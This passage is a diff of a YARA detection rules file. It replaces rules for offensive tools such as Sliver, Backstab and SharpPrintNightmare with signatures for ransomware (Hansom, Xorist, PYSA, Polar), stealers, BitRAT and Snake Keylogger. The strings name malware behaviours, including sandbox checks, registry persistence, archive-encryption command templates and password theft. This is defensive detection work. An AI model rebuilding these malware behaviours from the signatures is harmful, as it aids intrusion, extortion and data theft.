+		description = "Detects CRAT Clipboad Monitor plugin DLL"
 		author = "ditekSHen"
-		id = "878b5174-2368-5fc8-9573-7b2759cab409"
+		id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L766-L783"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1964-L1979"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "aae9355fcc7a6b5faf3807c85983032519550e936d5660c823d13731083be512"
+		logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "get_virtualExecUsage" fullword ascii
-		$s2 = "Command to execute" fullword ascii
-		$s3 = "<guestusername>k__" ascii
-		$s4 = ".VirtualMachineDeviceRuntimeInfoVirtualEthernetCardRuntimeState" ascii
-		$s5 = "datastoreUrl" ascii
-		$s6 = "SharpSphere.vSphere." ascii
-		$s7 = "HelpText+vCenter SDK URL, i.e. https://127.0.0.1/sdk" ascii
-		$s8 = "[x] Execution finished, attempting to retrieve the results" fullword wide
-		$s9 = "C:\\Windows\\System32\\cmd.exe" fullword wide
-		$s10 = "C:\\Users\\Public\\" fullword wide
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "Clipboard Monitor Mutex [%s] already created!" wide
+		$s2 = "ClipboardMonitorThread started!" fullword wide
+		$s3 = /MonitorClipboardThread\s(finished|terminated)!/ wide
+		$s4 = /ClipboardMonitor_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 5 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Exchangeexploit : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginscreencapture : FILE
 {
 	meta:
-		description = "Hunt for executables potentially embedding Exchange Server exploitation artificats"
+		description = "Detects CRAT Screen Capture plugin DLL"
 		author = "ditekSHen"
-		id = "429f738a-009a-5326-92e0-bdc907be96f2"
+		id = "ef0b6b88-8b1b-5ab5-ad81-276eaff0411f"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L785-L798"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L1981-L2000"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4b0d22a296cab6591d63568aa44845ef7fcc413d45c368a712928411d11a8177"
+		logic_hash = "7b4378ae883d01338fabe2eb50a5509b722c661e63afc287afa07b263a0ebc42"
 		score = 75
-		quality = 69
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "ecp/default.flt?" ascii wide nocase
-		$s2 = "owa/auth/logon.aspx?" ascii wide nocase
-		$s3 = "X-AnonResource-Backend" ascii wide
-		$s4 = "EWS/Exchange.asmx?" ascii wide nocase
-		$s5 = "X-BEResource" ascii wide
-		$s6 = "https://%s/owa/auth/" ascii wide
+		$ai1 = "VM detected!" fullword wide
+		$ai2 = "Sandbox detected!" fullword wide
+		$ai3 = "Debug detected!" fullword wide
+		$ai4 = "Analysis process detected!" fullword wide
+		$s1 = "User is inactive!, give up capture" wide
+		$s2 = "Capturing screen..." wide
+		$s3 = "%s\\P%02d%lu.tmp" fullword wide
+		$s4 = "CloseHandle ScreenCaptureMutex failure! %d" fullword wide
+		$s5 = "ScreenCaptureMutex already created! %s" fullword wide
+		$s6 = "Create ScreenCaptureMutex %s failure %d" fullword wide
+		$s7 = /ScreenCaptureThread\s(finished|terminated)!/ wide
+		$s8 = /ScreenCapture_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 5 of them
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $ai* ) and 1 of ( $s* ) ) or ( 3 of ( $s* ) and 1 of ( $ai* ) ) or 6 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Goclr : FILE
+rule DITEKSHEN_MALWARE_Win_Cratpluginransomhansom : FILE
 {
 	meta:
-		description = "Detects binaries utilizing Go-CLR for hosting the CLR in a Go process and using it to execute a DLL from disk or an assembly from memory"
+		description = "Detects CRAT Hansom Ransomware plugin DLL"
 		author = "ditekSHen"
-		id = "21766cad-17dd-525a-9ebe-cd90e892cff1"
+		id = "0bfc97df-545f-5453-afe0-5777dc1c95b4"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L800-L814"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2002-L2020"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a2a79793b1f530bcf9f79983f29a655f270cf0147606690b19eaeb82d4bd1f0d"
+		logic_hash = "b22f6d22630f311241634513eb051df2b36af84a938c1ae1f5284e5a5d7d3077"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
 
 	strings:
-		$s1 = "github.com/ropnop/go-clr.(*IC" ascii
-		$s2 = "EnumKeyExWRegEnumValueWRegOpenKeyExWRtlCopyMemoryRtlGetVersionShellExecuteWStartServiceW" ascii
-		$c1 = "ICorRuntimeHost" ascii wide
-		$c2 = "CLRCreateInstance" ascii wide
-		$c3 = "ICLRRuntimeInfo" ascii wide
-		$c4 = "ICLRMetaHost" ascii wide
-		$go = "Go build ID:" ascii wide
+		$cmd1 = "/f /im \"%s\"" wide
+		$cmd2 = "add HKLM\\%s /v %s /t REG_DWORD /d %d /F" wide
+		$cmd3 = "add HKCU\\%s /v %s /t REG_DWORD /d %d /F" wide
+		$cmd4 = "\"%s\" a -y -ep -k -r -s -ibck -df -m0 -hp%s -ri1:%d \"%s\" \"%s\"" wide
+		$s1 = "\\hansom.jpg" wide
+		$s2 = "HansomMain" fullword ascii wide
+		$s3 = "ExtractHansom" fullword ascii wide
+		$s4 = "Hansom2008" fullword ascii
+		$s5 = ".hansomkey" fullword wide
+		$s6 = ".hansom" fullword wide
+		$s7 = /Ransom_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) or ( 2 of ( $c* ) and $go )
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $cmd* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) and 1 of ( $cmd* ) ) or 6 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Edgecookiesview : FILE
+rule DITEKSHEN_MALWARE_Win_Aliencrypter : FILE
 {
 	meta:
-		description = "Detects EdgeCookiesView"
+		description = "Detects AlienCrypter injector/downloader/obfuscator"
 		author = "ditekSHen"
-		id = "42c6eb2e-bf5c-5956-9009-c29551ce715d"
+		id = "af9e785a-bdec-5d3e-9a50-56f7f1a0507e"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L833-L847"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2022-L2036"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ba6d416e02c1958806356c67636609dcca758da9f7e3d1fc15244cc5ff038fc"
+		logic_hash = "28a2a6e6d58fd6efbb5753a7be5b621a3eac546d45f9481b9dd2641cbe70b547"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "AddRemarkCookiesTXT" fullword wide
-		$s2 = "# Netscape HTTP Cookie File" fullword wide
-		$s3 = "/scookiestxt" fullword wide
-		$s4 = "/deleteregkey" fullword wide
-		$s5 = "Load cookies from:" wide
-		$s6 = "Old cookies folder of Edge/IE" wide
-		$pdb = "\\EdgeCookiesView\\Release\\EdgeCookiesView.pdb" ascii
+		$s1 = ".AlienRunPE." ascii wide
+		$s2 = "RunAsNewUser_RunDLL" fullword wide
+		$s3 = { 00 50 52 4f 43 45 53 53 5f 53 55 53 50 45 4e 44 5f 52 45 53 55 4d 45 00 64 6e 6c 69 62 2e 50 45 00 }
+		$s4 = { 2e 41 6c 69 65 6e 52 75 6e 50 45 00 50 52 4f 43 45 53 53 5f 54 45 52 4d 49 4e 41 54 45 00 }
+		$s5 = "@@@http" wide
+		$resp1 = "</p><p>@@@77,90," ascii wide
+		$resp2 = "</p><p>@@@HH,JA," ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
+		( uint16( 0 ) == 0x5a4d and 3 of them ) or ( 1 of ( $resp* ) and 2 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpnopsexec : FILE
+rule DITEKSHEN_MALWARE_Win_Ficker : FILE
 {
 	meta:
-		description = "Detects SharpNoPSExec"
+		description = "Detects Ficker infostealer"
 		author = "ditekSHen"
-		id = "10898364-6d77-5127-a16b-5fd3b1c652d5"
+		id = "1cfeea86-e8bf-50fb-ba08-435d7a14a913"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L849-L864"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2038-L2055"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c1d76639e7b6464d302729b48bbcd810216132868035904bb9866e7b31ccfac2"
+		logic_hash = "adcc0ffc0e1ded36dc41c22d10d2ea293d5740484203892bcecf89a5f4001452"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.Ficker"
 
 	strings:
-		$s1 = "|-> Service" wide
-		$s2 = "authenticated as" wide
-		$s3 = "ImpersonateLoggedOnUser failed. Error:{0}" wide
-		$s4 = "uPayload" fullword ascii
-		$s5 = "pcbBytesNeeded" fullword ascii
-		$s6 = "SharpNoPSExec" ascii wide
-		$pdb1 = "SharpNoPSExec\\obj\\Debug\\SharpNoPSExec.pdb" ascii
-		$pdb2 = "SharpNoPSExec\\obj\\Release\\SharpNoPSExec.pdb" ascii
+		$s1 = "JNOde\\" ascii
+		$s2 = "\"SomeNone" fullword ascii
+		$s3 = "kindmessage" fullword ascii
+		$s4 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writting non-UTF-8 byte sequences" ascii
+		$s5 = "..\\\\?\\.\\UNC\\Windows stdio in console mode does not support writing non-UTF-8 byte sequences" ascii
+		$s6 = "(os error other os erroroperation interrruptedwrite zerotimed" ascii
+		$s7 = "(os error other os erroroperation interruptedwrite zerotimed" ascii
+		$s8 = "nPipeAlreadyExistsWouldBlockInvalidInputInvalidDataTimedOutWriteZeroInterruptedOtherN" fullword ascii
+		$s9 = "_matherr(): %s in %s(%g, %g)  (retval=%g)" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $pdb* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Chromecookiesview : FILE
+rule DITEKSHEN_MALWARE_Win_Xorist : FILE
 {
 	meta:
-		description = "Detects ChromeCookiesView"
+		description = "Detects Xorist ransomware"
 		author = "ditekSHen"
-		id = "c1b89468-edf2-59d1-89b3-5822fa19d6ab"
+		id = "76119441-343d-51c3-90eb-9d54c80a983d"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L866-L880"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2057-L2078"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "81acd0978fc03525e7092ab51c681b61f9de0252066ce871298e2cd96b1d3024"
+		logic_hash = "b34e3fa065cabcd8d26908866e53ff599631128e1da884e42a2e63d890879eaa"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Xorist"
 
 	strings:
-		$s1 = "AddRemarkCookiesTXT" fullword wide
-		$s2 = "Decrypt cookies" wide
-		$s3 = "/scookiestxt" fullword wide
-		$s4 = "/deleteregkey" fullword wide
-		$s5 = "Cookies.txt Format" wide
-		$s6 = "# Netscape HTTP Cookie File" wide
-		$pdb = "\\ChromeCookiesView\\Release\\ChromeCookiesView.pdb" ascii
+		$x1 = { 00 4d 00 41 00 47 00 45 00 0b 00 50 00 55 00
+                53 00 53 00 59 00 4c 00 49 00 43 00 4b 00 45
+                00 52 00 }
+		$x2 = { 30 70 33 6e 53 4f 75 72 63 33 20 58 30 72 31 35
+                37 2c 20 6d 6f 74 68 65 72 66 75 63 6b 65 72 21
+                00 70 75 73 73 79 6c 69 63 6b 65 72 00 2e 62 6d
+                70 00 2e 00 2e 2e 00 6f 70 65 6e 00 2e 65 78 65 }
+		$s1 = "\\shell\\open\\command" fullword ascii
+		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword ascii
+		$s3 = "CRYPTED!" fullword ascii
+		$s4 = "Attention!" fullword ascii
+		$s5 = "Password:" fullword ascii
+		$s6 = { 43 6f 6d 53 70 65 63 00 2f 63 20 64 65 6c 20 22 00 22 20 3e 3e 20 4e 55 4c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( ( $pdb ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 5 of ( $s* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sliver : FILE
+rule DITEKSHEN_MALWARE_Win_PYSA : FILE
 {
 	meta:
-		description = "Detects Sliver implant cross-platform adversary emulation/red team"
+		description = "Detects PYSA/Mespinoza ransomware"
 		author = "ditekSHen"
-		id = "e0c5404b-8e6b-5c3a-9e37-56012c3802dd"
+		id = "3a3fad6a-46bc-51dc-9723-4412034ca442"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L882-L900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2080-L2100"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f9442b74c84c7b4a8fcf93de2919d12efe2f41d0b4e8514b43822fba0962af2"
+		logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.PYSA"
 
 	strings:
-		$x1 = "github.com/bishopfox/sliver/protobuf/sliverpbb." ascii
-		$s1 = ".commonpb.ResponseR" ascii
-		$s2 = ".PortfwdProtocol" ascii
-		$s3 = ".WGTCPForwarder" ascii
-		$s4 = ".WGSocksServerR" ascii
-		$s5 = ".PivotEntryR" ascii
-		$s6 = ".BackdoorReq" ascii
-		$s7 = ".ProcessDumpReq" ascii
-		$s8 = ".InvokeSpawnDllReq" ascii
-		$s9 = ".SpawnDll" ascii
-		$s10 = ".TCPPivotReq" ascii
+		$s1 = "%s\\Readme.README" fullword wide
+		$s2 = "Every byte on any types of your devices was encrypted" ascii
+		$s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) }
+		$s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) }
+		$s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53
+                4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f
+                66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72
+                65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69
+                63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 }
+		$f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii
+		$f2 = ".?AV?$TF_EncryptorImpl@" ascii
+		$f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 1 of ( $x* ) or 5 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and all of ( $f* ) and 3 of ( $s* )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Owlproxy : FILE
+rule DITEKSHEN_MALWARE_Win_Polar : FILE
 {
 	meta:
-		description = "Hunt for OwlProxy"
+		description = "Detects Polar ransomware"
 		author = "ditekSHen"
-		id = "86e2144e-c5d3-5bd6-b287-1157066126a3"
+		id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L902-L921"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2102-L2123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa7dd5eeb9799fd651317ceecbed6c960f16c387dc18723409053e44cd281582"
+		logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Ransomware.Polar"
 
 	strings:
-		$is1 = "call_new command: " wide
-		$is2 = "call_proxy cmd: " wide
-		$is3 = "download_file: " wide
-		$is4 = "cmdhttp_run" wide
-		$is5 = "sub_proxyhttp_run" wide
-		$is6 = "proxyhttp_run" wide
-		$is7 = "webshell_run" wide
-		$is8 = "/exchangetopicservices/" fullword wide
-		$is9 = "c:\\windows\\system32\\wmipd.dll" fullword wide
-		$iu1 = "%s://+:%d%s" wide
-		$iu2 = "%s://+:%d%spp/" wide
-		$iu3 = "%s://+:%d%spx/" wide
+		$s1 = "Encrypt Failed ! ErrorMessage :" wide
+		$s2 = ".locked" fullword wide
+		$s3 = ".cryptd" fullword wide
+		$s4 = "$SysReset" fullword wide
+		$s5 = "Polar.Properties.Resources" ascii wide
+		$s6 = "AES_EnDecryptor.Basement" fullword ascii
+		$s7 = "RunCMDCommand" fullword ascii
+		$s8 = "killerps_list" fullword ascii
+		$s9 = "clearlog" fullword ascii
+		$s10 = "encryptFile" fullword ascii
+		$s11 = "changeBackPictrue" fullword ascii
+		$pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii
+		$pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of ( $is* ) or ( all of ( $iu* ) and 2 of ( $is* ) )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 1 of ( $pdb* ) and 2 of ( $s* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_Backstab : FILE
+rule DITEKSHEN_MALWARE_Win_Bitrat : FILE
 {
 	meta:
-		description = "Detect Backstab tool capable of killing antimalware protected processes by leveraging sysinternals Process Explorer (ProcExp) driver"
+		description = "Detects BitRAT RAT"
 		author = "ditekSHen"
-		id = "1e514d03-9b78-5e75-9a31-02c0413e23a7"
+		id = "9041a21f-0f27-5e90-8429-863e361381bf"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L923-L939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2125-L2153"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d25c3ff4d7c120fdf7c275d11da7a321bcbdb275dcfaa699b5bb4bd66167ec92"
+		logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.BitRAT"
 
 	strings:
-		$s1 = "NtLoadDriver: %x" fullword ascii
-		$s2 = "POSIXLY_CORRECT" fullword ascii
-		$s3 = "\\\\.\\PROCEXP" ascii
-		$s4 = "ProcExpOpenProtectedProcess.DeviceIoControl: %" ascii
-		$s5 = "ProcExpKillHandle.DeviceIoControl" ascii
-		$s6 = "[%#llu] [%ws]: %ws" fullword ascii
-		$s7 = "D:P(A;;GA;;;SY)(A;;GRGWGX;;;BA)(A;;GR" wide
-		$s8 = "-k -d c:\\\\driver.sys" ascii
-		$s9 = "backstab.exe -" ascii
+		$s1 = "\\plg\\" fullword ascii
+		$s2 = "klgoff_del" fullword ascii
+		$s3 = "files_delete" ascii
+		$s4 = "files_zip_start" fullword ascii
+		$s5 = "files_exec" fullword ascii
+		$s6 = "drives_get" fullword ascii
+		$s7 = "srv_list" fullword ascii
+		$s8 = "con_list" fullword ascii
+		$s9 = "ddos_stop" fullword ascii
+		$s10 = "socks5_srv_start" fullword ascii
+		$s11 = "/getUpdates?offset=" fullword ascii
+		$s12 = "Action: /dlex" fullword ascii
+		$s13 = "Action: /clsbrw" fullword ascii
+		$s14 = "Action: /usb" fullword ascii
+		$s15 = "/klg" fullword ascii
+		$s16 = "klg|" fullword ascii
+		$s17 = "Slowloris" fullword ascii
+		$s18 = "Bot ID:" ascii
+		$t1 = "<sz>N/A</sz>" fullword ascii
+		$t2 = "<silent>N/A</silent>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 4 of ( $s* ) and 1 of ( $t* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_EXP_Sharpprintnightmare : FILE
+rule DITEKSHEN_MALWARE_Win_Poullight : FILE
 {
 	meta:
-		description = "Detect SharpPrintNightmare"
+		description = "Detects Poullight infostealer"
 		author = "ditekSHen"
-		id = "15f52fce-27cc-52e7-91d5-7e2f6db5b596"
+		id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L941-L961"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2155-L2176"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "22c890a22ce6b7c1a06068018364f7c5a2afe1bee5b5bc6a8bae3703a11fac26"
+		logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		snort2_sid = "920074-920075"
+		snort3_sid = "920074-920075"
+		clamav_sig = "MALWARE.Win.Trojan.Poullight"
 
 	strings:
-		$s1 = "RevertToSelf() Error:" wide
-		$s2 = "NeverGonnaGiveYou" wide
-		$s3 = "\\Amd64\\UNIDRV.DLL" wide
-		$s4 = ":\\Windows\\System32\\DriverStore\\FileRepository\\" wide
-		$s5 = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}" wide
-		$s6 = "\\SharpPrintNightmare\\" ascii
-		$s7 = { 4e 61 6d 65 09 46 75 6c 6c 54 72 75 73 74 01 }
-		$s8 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\PackageInstallation\\Windows x64\\DriverPackages" wide
-		$s9 = "ntprint.inf_amd64" wide
-		$s10 = "AddPrinterDriverEx" wide
-		$s11 = "addPrinter" ascii
-		$s12 = "DRIVER_INFO_2" ascii
-		$s13 = "APD_COPY_" ascii
+		$s1 = "zipx" fullword wide
+		$s2 = "{0}Windows Defender.exe" fullword wide
+		$s3 = "pll_test" fullword wide
+		$s4 = "loginusers.vdf" wide
+		$s5 = "Stealer by Nixscare" wide
+		$s6 = "path_lad" fullword ascii
+		$s7 = "<CheckVM>" ascii
+		$s8 = "Poullight.Properties" ascii
+		$s9 = "</ulfile>" fullword wide
+		$s10 = "{0}processlist.txt" fullword wide
+		$s11 = "{0}Browsers\\Passwords.txt" fullword wide
 
 	condition:
 		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_REC_Adfind : FILE
+rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE
 {
 	meta:
-		description = "Detect ADFind"
+		description = "Detects Snake Keylogger"
 		author = "ditekSHen"
-		id = "2f0d02a1-7488-5645-aa08-1eadee2862e8"
+		id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2"
 		date = "2020-11-06"
-		modified = "2024-09-25"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L963-L974"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2178-L2207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "41fb9f72032f76adc6f1fccd25a1364f153eb2430063e9d582f3dcd9fc9ac84a"
+		logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba"
 		score = 75
-		quality = 75
+		quality = 67
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger"
 
 	strings:
-		$s1 = "\\AdFind\\AdFind\\AdFind.h" ascii
-		$s2 = "\\AdFind\\AdFind\\AdFind.cpp" ascii
-		$s3 = "\\AdFind\\Release\\AdFind.pdb" ascii
-		$s4 = "joeware_default_adfind.cf" ascii
+		$id1 = "SNAKE-KEYLOGGER" fullword ascii
+		$id2 = "----------------S--------N--------A--------K--------E----------------" ascii
+		$s1 = "_KPPlogS" fullword ascii
+		$s2 = "_Scrlogtimerrr" fullword ascii
+		$s3 = "_Clpreptimerr" fullword ascii
+		$s4 = "_clprEPs" fullword ascii
+		$s5 = "_kLLTIm" fullword ascii
+		$s6 = "_TPSSends" fullword ascii
+		$s7 = "_ProHfutimer" fullword ascii
+		$s8 = "GrabbedClp" fullword ascii
+		$s9 = "StartKeylogger" fullword ascii
+		$x1 = "$%SMTPDV$" wide
+		$x2 = "$#TheHashHere%&" wide
+		$x3 = "%FTPDV$" wide
+		$x4 = "$%TelegramDv$" wide
+		$x5 = "KeyLoggerEventArgs" ascii
+		$m1 = "| Snake Keylogger" ascii wide
+		$m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide
+		$m3 = "SnakePW" ascii wide
+		$m4 = "\\SnakeKeylogger\\" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them
+		( uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) or 4 of ( $x* ) ) ) or ( 2 of ( $m* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Chisel : FILE
+rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE
 {
 	meta:
-		description = "Detect binaries using Chisel"
+		description = "Detects XORDDoS"
